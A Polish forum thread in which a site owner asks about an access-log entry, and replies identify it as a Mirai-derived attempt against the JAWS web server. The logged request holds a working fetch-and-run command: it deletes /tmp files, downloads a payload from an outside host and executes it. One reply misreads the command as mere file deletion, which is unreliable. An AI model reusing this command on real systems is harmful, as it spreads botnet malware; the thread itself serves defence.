phpamator
11.07.2022, 09:16:55
Hel-lo wszystkim
Jeśli macie a pewnie niektórzy maja z pewnościa ..
co to może być ?
GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-"
wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie.
Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy ....
Macie jakieś wytłumaczenie ?
Pozdrówka
phpamator
nospor
11.07.2022, 09:52:26
wyglada na to ze twoja strona ma routing o nazwie "shell" ktory pozwala na wykonanie komend na serwerze pobranych z adresu URL. Jesli to prawda to twoja strona jest jak otwarte drzwi do domu dla wlamywacza
Próba wykonania komend systemowych przez skrypt 'shell' tak jak nospor wyżej pisał, a dokładniej to atakujący chciał usunac jakies pliki z koncowka *.wget, plik jaws;sh z katalogu kreekxassa.ml i plik jaws w /tmp, sprawdz profilaktycznie czy nie masz jakichs sladow z tymi plikami, jesli masz to masz zainfekowaną stronę i mozliwe ze caly serwer.
gino
15.07.2022, 19:50:37
Podpytałem trochę naszych adminów bo już gdzieś mi się podobny link obił o oczy. To działanie exploitów oparte na kodzie Mirai, który w w Twoim przypadku chce dokonać nieautoryzowanego polecenia powłoki przez serwer Webserwer JAWS. Generalnie ataki tych exploitów (i pochodnych Mirai) zostały stworzone pierwotnie do ataków na IOT (internet rzeczy) w celu zainfekowania ich jak najwięcej ( w sensie np. ruterów czy serwerów sprzętowych) i utworzenia z nich sieci zdalnych botnetów do ataków na dużą skalę.
Pochodne Mirai niestety ciągle ewaluowują i np. któraś wersja Mirai wykorzystuje exploita Spring4Shell do infekowania podatnych serwerów internetowych i rekrutowania ich do ataków DDoS. Jest tego syfu znacznie więcej, tworząc kampanie i zestawy exploitów: Omni, Okai, Hakane itp.
Warto o tym poczytać.
StrefaPi
17.07.2022, 07:06:15
ale tu nie ma co się przejmować zapytanie według tego logu zwrocilo kod 400 czyli błąd...
gino
17.07.2022, 07:50:37
Jak dostaniesz ileśtam tysięcy takich wywołań w krótkim czasie to położy serwer a mi bardziej chodziło o trochę przydatnych informacji. Tutaj owszem dostał 400 bo jak pisałem to dotyczyło wywołania powłoki shella serwera JAWS.
StrefaPi
17.07.2022, 09:16:12
fail2ban?
gino
17.07.2022, 18:22:58
fail2ban nie chroni przed atakami brutal force rozproszonymi, np.z sieci zdalnych botnetów. W zasadzie chyba każde narzędzie z większym skorelowanym atakiem sobie nie poradzi. To tylko kwestia ilości rządań w czasie.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę
kliknij tutaj.